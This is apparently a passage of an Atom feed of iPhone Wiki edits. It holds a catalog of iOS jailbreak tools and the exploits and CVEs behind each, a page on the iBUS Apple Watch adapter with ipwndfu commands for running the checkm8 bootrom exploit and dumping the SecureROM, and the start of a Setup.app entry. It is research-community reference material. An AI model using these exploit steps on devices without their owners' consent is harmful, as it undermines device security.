		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=107432"/>
		<updated>2020-09-24T00:34:54Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added iOS 14 edit&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.2~b)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=IBUS&amp;diff=106819</id>
		<title>IBUS</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=IBUS&amp;diff=106819"/>
		<updated>2020-09-07T23:28:16Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Fixed capitalization of proper noun (&amp;quot;Apple&amp;quot;)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The &amp;quot;iBUS&amp;quot; adapter is a smaller &amp;quot;dongle&amp;quot; that takes advantage of the diagnostics port hidden behind a small plate in the slot where the band for your watch would normally slide into.&lt;br /&gt;
&lt;br /&gt;
These adapters are sold by &amp;quot;MFC&amp;quot; and appear to be clones of Apple's own proprietary hardware; When plugged into a Mac via lightning-to-USB, the Apple Watch appears in Finder in the same way that other apple devices do when plugged in. It is also recognized by [[libimobiledevice]], Xcode, and Apple's Console.app, although no logs are displayed in the latter.&lt;br /&gt;
&lt;br /&gt;
Not much information about these adapters has been released, by MFC or otherwise. &lt;br /&gt;
&lt;br /&gt;
Adapters for the S4 and S5 have been announced as &amp;quot;upcoming&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Usage for Research ==&lt;br /&gt;
While the adapters are marketed for their ability to &amp;quot;restore&amp;quot; devices, the signed firmware required to do so is not readily available. However, the adapter does allow exploitation of the S1, S2, and S3 Watches using [[checkm8]]&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Pwning&amp;quot; the watch and dumping the bootrom ===&lt;br /&gt;
&lt;br /&gt;
==== Entering DFU ====&lt;br /&gt;
Once you've connected your Apple watch via a standard USB Lightning cable and the iBUS adapter:&lt;br /&gt;
&lt;br /&gt;
# Hold the crown and power button down  &lt;br /&gt;
# Immediately after the screen goes black, count to 3  &lt;br /&gt;
# After 3 seconds, release the power button, but continue to hold the crown.  &lt;br /&gt;
&lt;br /&gt;
Finder should now show an &amp;quot;Apple Watch&amp;quot; in DFU mode, and will allow you to install signed firmware if you have any.&lt;br /&gt;
&lt;br /&gt;
==== Exploiting with ipwndfu ====&lt;br /&gt;
Reliability of checkm8 on the watch can vary. &lt;br /&gt;
&lt;br /&gt;
After cloning [https://github.com/axi0mX/ipwndfu], `cd` into the directory and run `./ipwndfu -p`&lt;br /&gt;
&lt;br /&gt;
If the exploit fails, you may need to run it again. It can take anywhere from one to several hundred attempts. &lt;br /&gt;
&lt;br /&gt;
From here, you can run `./ipwndfu --dump-rom` to dump the [[SecureRom]]. More information is available in the ipwndfu readme and on [[ipwndfu]].&lt;br /&gt;
&lt;br /&gt;
Do note the `--boot` flag currently only works for the iPhone X.&lt;br /&gt;
&lt;br /&gt;
You can use `./ipwndfu --hex-dump=0x0,0x10000000000` to crash out of DFU and force a reboot.&lt;br /&gt;
&lt;br /&gt;
== Tips for usage ==&lt;br /&gt;
* As the metal rod that ships with the adapter often fits loosely, consider using rubber bands to firmly press the adapter into the port. &lt;br /&gt;
** A hairband is exceptional at this, and perfectly fits into the top of the watch. &lt;br /&gt;
&lt;br /&gt;
{{DISPLAYTITLE:iBUS}}&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/Applications/Setup.app&amp;diff=106818</id>
		<title>/Applications/Setup.app</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/Applications/Setup.app&amp;diff=106818"/>
		<updated>2020-09-07T18:58:20Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Fixed minor grammar issue&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:Setup.app.png|thumb|360px|Setup.app running on an iPhone 5]]&lt;br /&gt;
This application uses Framework 7 style and starts automatically after a restore or if [[lockdownd]] detects the device to be Unactivated (e.g. by deleting content of activation_records within Lockdown folder, you can trigger this effect).&lt;br /&gt;
&lt;br /&gt;
The file comes as a standard Apple Pre-installed .app file and it draws it's form as a pop up window.&lt;br /&gt;
